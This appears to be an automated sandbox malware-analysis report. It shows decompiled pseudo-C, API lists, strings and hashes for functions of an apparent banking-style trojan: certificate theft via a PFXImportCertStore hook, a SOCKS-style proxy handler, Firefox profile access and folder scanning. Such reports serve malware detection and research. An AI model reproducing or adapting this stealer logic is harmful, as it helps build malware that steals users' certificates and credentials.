Function 0041C01D, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 217
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0041C01D(void* __eflags, signed int _a4) {
				char _v9;
				char _v13;
				char _v20;
				signed int _v24;
				signed int _v29;
				short _v31;
				signed char _v32;
				intOrPtr _v36;
				signed int _v48;
				short _v50;
				char _v52;
				char _v312;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t59;
				void* _t61;
				short _t77;
				void* _t79;
				void* _t84;
				char _t103;
				char* _t105;
				signed int _t115;
				void* _t125;
				intOrPtr _t126;
				void* _t127;
				char _t129;
				void* _t131;
				intOrPtr _t132;
				void* _t133;

				_t110 = _a4;
				_t59 = E0040F77A(_t110);
				_push(0);
				_push( &_v32);
				_t61 = 7;
				_v24 = 0 | _t59 == 0x00000017;
				if(E0040F175(_t61, _t110) != 0) {
					while(E0040F175(1, _t110,  &_v9, 0) != 0) {
						if(_v9 == 0) {
							_t115 = _v29;
							_t116 = _t115 << 0x10;
							_v13 = 0x5a;
							if(((_t115 & 0x00ff0000 | _t115 >> 0x00000010) >> 0x00000008 | (_t115 & 0x0000ff00 | _t115 << 0x00000010) << 0x00000008) - 1 > 0xfe) {
								L20:
								_v9 = 1;
								if(_v13 != 0x5a) {
									L44:
									return E0041BFA7(_t110, 0xffffffff, _v13, _v24) & 0xffffff00 | _t73 != 0x00000000;
								}
								E0040C275( &_v52,  &_v52, 0, 0x10);
								_t77 = 2;
								_v52 = _t77;
								_t79 = (_v32 & 0x000000ff) - 1;
								if(_t79 == 0) {
									_v50 = _v31;
									_v48 = _v29;
									_t127 = E0040F20A( &_v52);
									if(_t127 == 0xffffffff) {
										L23:
										_v13 = 0x5b;
										goto L44;
									}
									E0040F5BD(_t116, _t127);
									_t84 = E0041BFA7(_t110, _t127, 0x5a, _v24);
									if(_t84 != 1) {
										if(_t84 != 0xffffffff) {
											_v9 = 0;
										} else {
											_v13 = 0x5b;
										}
									} else {
										_push(_t127);
										_t84 = E0040F3BE(_t110);
									}
									E0040F565(_t84, _t127);
									if(_v9 != 1 || _v13 == 0x5a) {
										L34:
										return _v9;
									} else {
										goto L44;
									}
								}
								if(_t79 == 1) {
									_t129 = E0040F304( &_v52, 1);
									_v20 = _t129;
									if(_t129 == 0xffffffff) {
										goto L23;
									}
									_t125 = E0041BFA7(_t110, _t129, 0x5a, _v24);
									if(_t125 != 1) {
										L31:
										E0040F565(_t89, _t129);
										if(_t125 == 0xffffffff) {
											goto L23;
										}
										if(_t125 != 1) {
											_v9 = 0;
										}
										goto L34;
									}
									_t126 = E0040F535( &_v20,  &_a4);
									_v36 = _t126;
									E0040F565(_t93, _v20);
									if(_t126 != 0xffffffff) {
										E0040F5BD(_t116, _t126);
										_t110 = _a4;
										_t125 = E0041BFA7(_a4, _t126, 0x5a, _v24 | 0x00000002);
										if(_t125 == 1) {
											_push(_v36);
											_t89 = E0040F3BE(_t110);
										}
										_t129 = _v36;
										goto L31;
									}
									_t110 = _a4;
									_v13 = 0x5b;
									goto L44;
								}
								goto L23;
							}
							_t131 = 0;
							while(1) {
								_t116 = _t110;
								if(E0040F175(1, _t110,  &_v9, 0) == 0) {
									goto L1;
								}
								_t103 = _v9;
								 *((char*)(_t133 + _t131 - 0x134)) = _t103;
								if(_t103 == 0) {
									_t105 =  &_v312;
									_v20 = 0;
									__imp__getaddrinfo(_t105, 0, 0,  &_v20);
									if(_t105 == 0) {
										_t132 = _v20;
										while(_t132 != 0) {
											if( *((intOrPtr*)(_t132 + 4)) == 2) {
												E0040C1FE( &_v29,  *((intOrPtr*)(_t132 + 0x18)) + 4, 4);
												L19:
												__imp__freeaddrinfo(_v20);
												if(_t132 == 0) {
													goto L12;
												}
												goto L20;
											}
											_t132 =  *((intOrPtr*)(_t132 + 0x1c));
										}
										goto L19;
									}
									L12:
									_v13 = 0x5b;
									goto L20;
								}
								_t131 = _t131 + 1;
								if(_t131 <= 0xff) {
									continue;
								}
								goto L1;
							}
							goto L1;
						}
					}
				}
				L1:
				return 0;
			}

0x0041c027
0x0041c02d
0x0041c03d
0x0041c041
0x0041c044
0x0041c045
0x0041c051
0x0041c060
0x0041c05e
0x0041c075
0x0041c08e
0x0041c09c
0x0041c0a5
0x0041c12f
0x0041c133
0x0041c137
0x0041c265
0x00000000
0x0041c275
0x0041c144
0x0041c14b
0x0041c14c
0x0041c154
0x0041c155
0x0041c209
0x0041c213
0x0041c21b
0x0041c220
0x0041c15e
0x0041c15e
0x00000000
0x0041c15e
0x0041c227
0x0041c233
0x0041c23b
0x0041c248
0x0041c250
0x0041c24a
0x0041c24a
0x0041c24a
0x0041c23d
0x0041c23d
0x0041c23e
0x0041c23e
0x0041c254
0x0041c25d
0x0041c1fb
0x00000000
0x00000000
0x00000000
0x00000000
0x0041c25d
0x0041c15c
0x0041c171
0x0041c173
0x0041c179
0x00000000
0x00000000
0x0041c187
0x0041c18c
0x0041c1e4
0x0041c1e4
0x0041c1ec
0x00000000
0x00000000
0x0041c1f5
0x0041c1f7
0x0041c1f7
0x00000000
0x0041c1f5
0x0041c19e
0x0041c1a0
0x0041c1a3
0x0041c1ab
0x0041c1ba
0x0041c1c2
0x0041c1d2
0x0041c1d7
0x0041c1d9
0x0041c1dc
0x0041c1dc
0x0041c1e1
0x00000000
0x0041c1e1
0x0041c1ad
0x0041c1b0
0x00000000
0x0041c1b0
0x00000000
0x0041c15c
0x0041c0ab
0x0041c0ad
0x0041c0b5
0x0041c0be
0x00000000
0x00000000
0x0041c0c0
0x0041c0c3
0x0041c0cc
0x0041c0e2
0x0041c0e9
0x0041c0ec
0x0041c0f4
0x0041c0fc
0x0041c10a
0x0041c105
0x0041c11d
0x0041c122
0x0041c125
0x0041c12d
0x00000000
0x00000000
0x00000000
0x0041c12d
0x0041c107
0x0041c107
0x00000000
0x0041c10e
0x0041c0f6
0x0041c0f6
0x00000000
0x0041c0f6
0x0041c0ce
0x0041c0d5
0x00000000
0x00000000
0x00000000
0x0041c0d7
0x00000000
0x0041c0ad
0x0041c05e
0x0041c060
0x0041c053
0x00000000

APIs

Part of subcall function 0040F77A: #6.WS2_32(?,?,?), ref: 0040F798

getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 0041C0EC
freeaddrinfo.WS2_32(?,?,?,00000004), ref: 0041C125

Part of subcall function 0040F5BD: #21.WS2_32(?,00000006,00000001,?,00000004,?,?,0041427D,00000000), ref: 0040F5D3

Part of subcall function 0041BFA7: #5.WS2_32(000000FF,?,00000000,00414093,?,00000000), ref: 0041BFCB

Part of subcall function 0040F3BE: #18.WS2_32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040F45E

Strings

Z, xrefs: 0041C25F

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: freeaddrinfogetaddrinfo
String ID: Z
API String ID: 1109861670-1505515367
Opcode ID: 59cfe92271cc35a78d796e13227fcdcb31e4e3dfb2690ada9dbcb71ba9e7937a
Instruction ID: fdc04efec32a882b34bcffebf4bb7e6cd3fb7c41ba6f96698677505b711400e1
Opcode Fuzzy Hash: 59cfe92271cc35a78d796e13227fcdcb31e4e3dfb2690ada9dbcb71ba9e7937a
Instruction Fuzzy Hash: 5261E732E80258BBDF2096A8CC85AEF7B759F45314F04417BE915F32C2D67C8985CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00409B6E, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101
timeCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E00409B6E(intOrPtr __eax, void* __ecx, intOrPtr* _a4, intOrPtr* _a8, signed int _a12) {
				char _v536;
				char _v600;
				char _v728;
				char _v744;
				struct _SYSTEMTIME _v760;
				intOrPtr _v764;
				intOrPtr _v772;
				intOrPtr _v776;
				char _v784;
				void* __edi;
				void* __esi;
				void* _t47;
				void* _t58;
				intOrPtr* _t59;
				void* _t61;
				void* _t65;
				intOrPtr* _t66;
				void* _t67;
				void* _t71;
				char* _t74;
				signed int _t76;
				void* _t78;
				void* _t79;

				_t61 = __ecx;
				_t78 = (_t76 & 0xfffffff8) - 0x2fc;
				_t59 = _a4;
				__imp__PFXImportCertStore(_t59, _a8, _a12, _t67, _t71, _t58);
				_v776 = __eax;
				if(__eax != 0 && (_a12 & 0x10000000) == 0 && _t59 != 0 &&  *_t59 > 0 &&  *((intOrPtr*)(_t59 + 4)) != 0 && E004132A1() != 0) {
					GetSystemTime( &_v760);
					E004128DB(0xaa,  &_v600);
					_t74 =  &_v744;
					E004128DB(0xab, _t74);
					E0040994D( &_v536, _t61);
					_push(_v760.wYear & 0x0000ffff);
					_push(_v760.wMonth & 0x0000ffff);
					_push(_v760.wDay & 0x0000ffff);
					_push(_t74);
					_push( &_v536);
					_push( &_v600);
					_t65 = 0x3e;
					_t47 = E0040CEB5( &_v600, _t65,  &_v728);
					_t79 = _t78 + 0x18;
					if(_t47 > 0 && E0040925A(_t61, _t65, 2, 0,  &_v728,  *((intOrPtr*)(_t59 + 4)),  *_t59) != 0) {
						_t66 = _a8;
						if(_t66 != 0 &&  *_t66 != 0) {
							 *((short*)(E0040C1FE(_t79 + 0x48 + E0040CD11( &_v728) * 2, L".txt", 8) + 8)) = 0;
							_t64 = _t66;
							if(E0040D019(_t52 | 0xffffffff, _t66,  &_v784) != 0) {
								E0040925A(_t64, _t66, 2, 0,  &_v728, _v772, _v764);
								E0040D007( &_v784);
							}
						}
					}
				}
				return _v776;
			}

0x00409b6e
0x00409b74
0x00409b7b
0x00409b87
0x00409b8d
0x00409b93
0x00409bd3
0x00409be5
0x00409bea
0x00409bf3
0x00409bff
0x00409c09
0x00409c0f
0x00409c15
0x00409c18
0x00409c20
0x00409c28
0x00409c2b
0x00409c30
0x00409c35
0x00409c3a
0x00409c52
0x00409c57
0x00409c7a
0x00409c85
0x00409c8e
0x00409ca0
0x00409ca5
0x00409ca5
0x00409c8e
0x00409c57
0x00409c3a
0x00409cb4

APIs

PFXImportCertStore.CRYPT32(?,?,?), ref: 00409B87

Part of subcall function 004132A1: WaitForSingleObject.KERNEL32(00000000,00407D52,00000310,00000000,00000310,909011A5,00000002), ref: 004132A9

GetSystemTime.KERNEL32(?), ref: 00409BD3

Part of subcall function 0040994D: GetUserNameExW.SECUR32(00000002,?,?), ref: 00409962

Strings

.txt, xrefs: 00409C69

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: CertImportNameObjectSingleStoreSystemTimeUserWait
String ID: .txt
API String ID: 1412380219-2195685702
Opcode ID: 9d90e6ad6bdbbb1a9ea4ef99a9c5c2329479eae1f6188420c4bf968b35768a2a
Instruction ID: df1f6b6c04e867f659c2950d60bdbbbbc715dda6fa5453833b5e9b0218e6adf6
Opcode Fuzzy Hash: 9d90e6ad6bdbbb1a9ea4ef99a9c5c2329479eae1f6188420c4bf968b35768a2a
Instruction Fuzzy Hash: EC31D031508341AADB20AF55CD41BABB7E9AF89308F00053FB984A72D2D77AD945C766

Uniqueness

Uniqueness Score: -1.00%

Function 00417791, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00404B0C,00000000,00004401,00404B1C,?,?,00000000,00000001), ref: 004177C1
CoCreateInstance.OLE32(00404ADC,00000000,00004401,00404AEC,?,?,00000000,00000001), ref: 00417814

Strings

D, xrefs: 0041783F

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: CreateInstance
String ID: D
API String ID: 542301482-2746444292
Opcode ID: cf720a1af7af2112a942e58ba2f9be920710b1e26a7f7afc94fada329f44055a
Instruction ID: a682e6a46b476f20ad2125105daf9ba79b2c3500b7f9930b23a7488541202ff4
Opcode Fuzzy Hash: cf720a1af7af2112a942e58ba2f9be920710b1e26a7f7afc94fada329f44055a
Instruction Fuzzy Hash: A6317CB2208305AFE710DF55C888DABBBFDAB84754F10092AFA5497280D734ED45CB66

Uniqueness

Uniqueness Score: -1.00%

Function 0041081B, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E0041081B(void* __ecx, intOrPtr _a4, intOrPtr _a12, signed char _a16) {
				signed int _v14;
				signed int _v16;
				signed int _v20;
				char _v284;
				unsigned int _t24;
				void* _t26;
				signed int _t28;
				signed int* _t29;
				void* _t30;
				void* _t41;
				char* _t42;
				void* _t45;
				signed int _t46;
				void* _t47;

				_t45 = __ecx;
				_t24 = E0040C1FE( &_v20, _a4, 0x10);
				_v20 = _v20 ^ _t24;
				_v16 = _v16 ^ _t24;
				_v14 = _v14 ^ _t24 >> 0x00000010;
				_t41 = 0;
				_t26 = 0;
				do {
					 *(_t47 + _t41 - 8) =  *(_t47 + _t41 - 8) ^  *(_t47 + _t26 + 0xc);
					_t26 = _t26 + 1;
					if(_t26 == 4) {
						_t26 = 0;
					}
					_t41 = _t41 + 1;
				} while (_t41 < 8);
				if(_a12 != 0) {
					E0040C1FE( &_v284, _a12, 0x102);
					E0040D63E( &_v284, _t41,  &_v20, 0x10);
				}
				_t28 = _a16 & 0x000000ff;
				if(_t28 != 0) {
					_t30 = _t28 - 1;
					if(_t30 == 0) {
						_t42 = L"Local\\";
						_push(6);
						goto L11;
					} else {
						if(_t30 == 1) {
							_t42 = L"Global\\";
							_push(7);
							L11:
							_pop(_t46);
							E0040C563(_t46, _t42, _t45);
							_t45 = _t45 + _t46 * 2;
						}
					}
				}
				_t29 =  &_v20;
				__imp__StringFromGUID2(_t29, _t45, 0x28);
				return _t29;
			}

0x0041082b
0x00410831
0x00410836
0x00410839
0x00410840
0x00410844
0x00410846
0x00410848
0x0041084c
0x00410850
0x00410854
0x00410856
0x00410856
0x00410858
0x00410859
0x00410862
0x00410873
0x00410884
0x00410884
0x0041088d
0x00410890
0x00410892
0x00410893
0x004108a1
0x004108a6
0x00000000
0x00410895
0x00410896
0x00410898
0x0041089d
0x004108a8
0x004108a8
0x004108ad
0x004108b2
0x004108b2
0x00410896
0x00410893
0x004108b8
0x004108bc
0x004108c5

APIs

StringFromGUID2.OLE32(00000000,?,00000028,00413175,?,00000010,00000000,0001FE38), ref: 004108BC

Strings

Local\, xrefs: 004108A1
Global\, xrefs: 00410898

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: FromString
String ID: Global\$Local\
API String ID: 1694596556-639276846
Opcode ID: 688bcf12deaa400928a09dfb99512953c9a451fbf2c6c90639904519df71f1d1
Instruction ID: 66ecb4ed94e550de57b73d167899809bd7a3235145e319b751bf6484d356e19d
Opcode Fuzzy Hash: 688bcf12deaa400928a09dfb99512953c9a451fbf2c6c90639904519df71f1d1
Instruction Fuzzy Hash: 6F11043151425DA6DB24EBB48C46BEF3669EF44700F00893BE142F61C1DAB8D5C6C7A8

Uniqueness

Uniqueness Score: -1.00%

Function 00404F50, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404F50(struct HINSTANCE__* __eax) {
				char _v8;
				char _v20;
				char _v108;
				void* __edi;
				void* __esi;
				struct HINSTANCE__* _t11;
				void* _t18;
				signed int _t25;
				short* _t33;
				void* _t43;

				_t11 = __eax;
				_t33 = __eax;
				if( *0x423b0c > 1) {
					_t11 = GetModuleHandleW(L"nspr4.dll");
					if(_t11 != 0) {
						if(_t33 == 0 ||  *_t33 == 0) {
							return E00404CE2(__eflags, 0);
						}
						_t11 = E0040C1AA(2 + E0040CD11(_t33) * 4);
						_t31 = _t11;
						if(_t11 != 0) {
							_t25 = E0040D019(E0040D0CE(_t33, _t31) | 0xffffffff, _t31,  &_v20);
							_t11 = E0040C1C2(_t31);
							if(_t25 != 0) {
								_t18 = 0x31;
								E004128A5(_t18,  &_v108);
								_t43 = E0040CF86( &_v8,  &_v108, _v20);
								_t11 = E0040D007( &_v20);
								_t44 = _t25 & 0xffffff00 | _t43 > 0x00000000;
								if((_t25 & 0xffffff00 | _t43 > 0x00000000) != 0) {
									E00404CE2(_t44, _v8);
									return E0040C1C2(_v8);
								}
							}
						}
					}
				}
				return _t11;
			}

0x00404f50
0x00404f60
0x00404f62
0x00404f6d
0x00404f75
0x00404f7d
0x00000000
0x00404fff
0x00404f93
0x00404f98
0x00404f9c
0x00404fb5
0x00404fb7
0x00404fbe
0x00404fc5
0x00404fc6
0x00404fdd
0x00404fe2
0x00404fe7
0x00404fe9
0x00404fee
0x00000000
0x00404ff6
0x00404fe9
0x00404fbe
0x00404f9c
0x00404f75
0x00405008

APIs

GetModuleHandleW.KERNEL32(nspr4.dll,00000000,0001FE38,00000000), ref: 00404F6D

Part of subcall function 0040C1C2: HeapFree.KERNEL32(00000000,00000000,0040D9B9,00000000,?,?,?,00412A7F,00000000,00412F59), ref: 0040C1D5

Part of subcall function 00404CE2: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?,?,00000000), ref: 00404D09
Part of subcall function 00404CE2: GetFileAttributesW.KERNEL32(?,?,?,?,?), ref: 00404D5D
Part of subcall function 00404CE2: GetPrivateProfileIntW.KERNEL32 ref: 00404DC0
Part of subcall function 00404CE2: GetPrivateProfileStringW.KERNEL32 ref: 00404DEC

Strings

,A, xrefs: 00404FD1, 00404FEB, 00404FD4
nspr4.dll, xrefs: 00404F68

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: PrivateProfile$AttributesFileFolderFreeHandleHeapModulePathString
String ID: nspr4.dll$,A
API String ID: 119068519-422305081
Opcode ID: b061e85874be330fe20ce8b090b50ce2ce743a1d9dafaac78a68d651c67b7bb2
Instruction ID: ef3f0f02c76b746cc59349577793d23cf911c918ba8157663eaa76fd9c8287b3
Opcode Fuzzy Hash: b061e85874be330fe20ce8b090b50ce2ce743a1d9dafaac78a68d651c67b7bb2
Instruction Fuzzy Hash: A311E332A00200A7DF2177768C4269F77699F8031CF18013BFA01BB2E2DB7C8D05999D

Uniqueness

Uniqueness Score: -1.00%

Function 004194F0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E004194F0(void* __eflags) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v52;
				char _v572;
				void* __edi;
				void* __esi;
				char* _t22;
				signed int _t30;
				char* _t32;
				void* _t34;

				_t32 =  &_v52;
				E004128DB(0x81, _t32);
				_v16 = _t32;
				_v28 = 0x26;
				_v24 = 0x1a;
				_v20 = 0x23;
				E0040C275( &_v12,  &_v12, 0, 8);
				_t30 = 0;
				do {
					_t22 =  &_v572;
					__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t34 + _t30 * 4 - 0x18)), 0, 0, _t22);
					_t37 = _t22;
					if(_t22 == 0) {
						_t29 =  &_v16;
						E004118EB( &_v572,  &_v16, _t37, 1, 2, E00419255,  &_v12, 0, 0, 0);
					}
					_t30 = _t30 + 1;
				} while (_t30 < 3);
				if(_v8 <= 0) {
					return E0040C1C2(_v12);
				}
				return E00417504(_t29, _v12, 0xcb);
			}

0x004194fb
0x00419503
0x0041950c
0x00419516
0x0041951d
0x00419524
0x0041952b
0x00419530
0x00419532
0x00419532
0x00419540
0x00419546
0x00419548
0x0041955a
0x00419563
0x00419563
0x00419568
0x00419569
0x00419571
0x00000000
0x0041958a
0x00000000

APIs

SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008,?,00000000), ref: 00419540

Part of subcall function 004118EB: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 0041192A
Part of subcall function 004118EB: WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 00411951
Part of subcall function 004118EB: PathMatchSpecW.SHLWAPI(?,?,?,?,?,00000000), ref: 0041199B
Part of subcall function 004118EB: Sleep.KERNEL32(00000000,?,?), ref: 004119F8
Part of subcall function 004118EB: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 00411A26
Part of subcall function 004118EB: FindClose.KERNEL32(?,?,?,?,00000000), ref: 00411A38

Part of subcall function 0040C1C2: HeapFree.KERNEL32(00000000,00000000,0040D9B9,00000000,?,?,?,00412A7F,00000000,00412F59), ref: 0040C1D5

Strings

&, xrefs: 00419516
#, xrefs: 00419524

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
String ID: #$&
API String ID: 3438805939-3870246384
Opcode ID: 1d8df8f779fe98b02ed48fbef80eaac9d4c4e9ed3fe9fe3d1463b9d8abc28e5d
Instruction ID: bcdfd5bb5c9d5406af1c334a7b2343c7b4dba703b798cc1429183fc3ad7eeac1
Opcode Fuzzy Hash: 1d8df8f779fe98b02ed48fbef80eaac9d4c4e9ed3fe9fe3d1463b9d8abc28e5d
Instruction Fuzzy Hash: 4B11AC72A01228BADB20AB82DC49FDF7F7DEF41344F00416AF605B6180D7784B86CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00419E11, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00419E11(void* __eflags) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v60;
				char _v580;
				void* __edi;
				void* __esi;
				char* _t22;
				signed int _t30;
				char* _t32;
				void* _t34;

				_t32 =  &_v60;
				E004128DB(0x95, _t32);
				_v16 = _t32;
				_v28 = 0x26;
				_v24 = 0x1a;
				_v20 = 0x23;
				E0040C275( &_v12,  &_v12, 0, 8);
				_t30 = 0;
				do {
					_t22 =  &_v580;
					__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t34 + _t30 * 4 - 0x18)), 0, 0, _t22);
					_t37 = _t22;
					if(_t22 == 0) {
						_t29 =  &_v16;
						E004118EB( &_v580,  &_v16, _t37, 1, 2, E00419B82,  &_v12, 0, 0, 0);
					}
					_t30 = _t30 + 1;
				} while (_t30 < 3);
				if(_v8 <= 0) {
					return E0040C1C2(_v12);
				}
				return E00417504(_t29, _v12, 0xcb);
			}

0x00419e1c
0x00419e24
0x00419e2d
0x00419e37
0x00419e3e
0x00419e45
0x00419e4c
0x00419e51
0x00419e53
0x00419e53
0x00419e61
0x00419e67
0x00419e69
0x00419e7b
0x00419e84
0x00419e84
0x00419e89
0x00419e8a
0x00419e92
0x00000000
0x00419eab
0x00000000

APIs

SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008,?,00000000), ref: 00419E61

Part of subcall function 004118EB: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 0041192A
Part of subcall function 004118EB: WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 00411951
Part of subcall function 004118EB: PathMatchSpecW.SHLWAPI(?,?,?,?,?,00000000), ref: 0041199B
Part of subcall function 004118EB: Sleep.KERNEL32(00000000,?,?), ref: 004119F8
Part of subcall function 004118EB: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 00411A26
Part of subcall function 004118EB: FindClose.KERNEL32(?,?,?,?,00000000), ref: 00411A38

Part of subcall function 0040C1C2: HeapFree.KERNEL32(00000000,00000000,0040D9B9,00000000,?,?,?,00412A7F,00000000,00412F59), ref: 0040C1D5

Strings

&, xrefs: 00419E37
#, xrefs: 00419E45

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
String ID: #$&
API String ID: 3438805939-3870246384
Opcode ID: e4e6e4f32ba85d199864f80ec82fe6d5338144ade900ecc6c971a90c58a06d87
Instruction ID: deb6fce1a53d176f144bb4d1a94705dbf6ca73d78d1668b33070a51db5f41335
Opcode Fuzzy Hash: e4e6e4f32ba85d199864f80ec82fe6d5338144ade900ecc6c971a90c58a06d87
Instruction Fuzzy Hash: 2211C276E01218BADB20DB96DC49FDFBF78EF41314F00416AF605B6180D3785A86CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00413782, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00413782(void* __eflags) {
				signed int _v8;
				char _v20;
				char _v44;
				char _v92;
				void* __edi;
				void* __esi;
				void* _t17;
				CHAR* _t27;
				intOrPtr* _t28;
				WCHAR* _t30;
				struct HINSTANCE__* _t31;

				_t30 =  &_v44;
				E004128DB(0xe3, _t30);
				_t31 = GetModuleHandleW(_t30);
				if(_t31 != 0) {
					_t27 =  &_v20;
					E004128A5(0xe4, _t27);
					_t28 = GetProcAddress(_t31, _t27);
					if(_t28 == 0) {
						L4:
						_t17 = 0;
						L6:
						return _t17;
					}
					_v8 = _v8 & 0x00000000;
					_t32 =  &_v92;
					E004128DB(0xd5,  &_v92);
					_push(0x1e6);
					_push("0x022A3598");
					if(E0040CF30( &_v8, _t32, 0x4000001) > 0) {
						 *_t28(0, _v8, "#", 0x10040);
						E0040C1C2(_v8);
						_t17 = 1;
						goto L6;
					}
					goto L4;
				}
				return 0;
			}

0x00413789
0x00413791
0x0041379f
0x004137a3
0x004137aa
0x004137b2
0x004137c1
0x004137c5
0x004137fa
0x004137fa
0x00413819
0x00000000
0x00413819
0x004137c7
0x004137cb
0x004137d3
0x004137d8
0x004137dd
0x004137f8
0x0041380d
0x00413812
0x00413817
0x00000000
0x00413817
0x00000000
0x004137f8
0x00000000

APIs

GetModuleHandleW.KERNEL32(?), ref: 00413799
GetProcAddress.KERNEL32(00000000,?), ref: 004137BB

Strings

0x022A3598, xrefs: 004137DD

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: 0x022A3598
API String ID: 1646373207-2963996362
Opcode ID: f6c451ebe9f6ab5842b575ba48043c2d456ed474a9a6e69370e07fe662376cda
Instruction ID: 47cfbd91c1fcfddae60ada0b4406c75668d16a5039d252e2f693c1a17f020e89
Opcode Fuzzy Hash: f6c451ebe9f6ab5842b575ba48043c2d456ed474a9a6e69370e07fe662376cda
Instruction Fuzzy Hash: B901F9B6A00204B7DB107BA99C06BDF376C9B80715F000126FD01F7281DA7C9F8586A9

Uniqueness

Uniqueness Score: -1.00%

Function 0041153E, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E0041153E(intOrPtr _a4, intOrPtr _a8) {
				short _v524;
				char _v1044;
				void* __edi;
				void* _t12;
				void* _t20;
				void* _t21;

				if(GetTempPathW(0xf6,  &_v524) - 1 > 0xf5) {
					L6:
					return 0;
				}
				_t20 = 0;
				while(1) {
					_push(_a4);
					_push(E0040D4FB());
					_push(L"tmp");
					_t19 =  &_v1044;
					_t12 = E0040CEB5(_t11, 0x104,  &_v1044, L"%s%08x.%s");
					_t21 = _t21 + 0x10;
					if(_t12 == 0xffffffff) {
						goto L6;
					}
					if(E00411A47(_t19, _a8,  &_v524) == 0 || E00411372(_a8, 0, 0) == 0) {
						_t20 = _t20 + 1;
						if(_t20 < 0x64) {
							continue;
						}
						goto L6;
					} else {
						return 1;
					}
				}
				goto L6;
			}

0x00411561
0x004115bb
0x00000000
0x004115bb
0x00411563
0x00411565
0x00411565
0x0041156d
0x0041156e
0x0041157d
0x00411583
0x00411588
0x0041158e
0x00000000
0x00000000
0x004115a3
0x004115b5
0x004115b9
0x00000000
0x00000000
0x00000000
0x004115c3
0x00000000
0x004115c3
0x004115a3
0x00000000

APIs

GetTempPathW.KERNEL32(000000F6,?), ref: 00411555

Part of subcall function 0040D4FB: GetTickCount.KERNEL32 ref: 0040D4FB

Part of subcall function 00411A47: PathCombineW.SHLWAPI(00412BBC,00412BBC,?,00412BBC,?,?), ref: 00411A66

Part of subcall function 00411372: CreateFileW.KERNEL32(0040DC9C,40000000,00000001,00000000,00000002,00000080,00000000,00000000,00000000,?,004115B1,0040DC9C,00000000,00000000,0040DC9C,?), ref: 0041138C
Part of subcall function 00411372: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,004115B1,0040DC9C,00000000,00000000,0040DC9C,?), ref: 004113AF
Part of subcall function 00411372: CloseHandle.KERNEL32(00000000,?,004115B1,0040DC9C,00000000,00000000,0040DC9C,?), ref: 004113BC

Strings

tmp, xrefs: 0041156E
%s%08x.%s, xrefs: 00411573

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

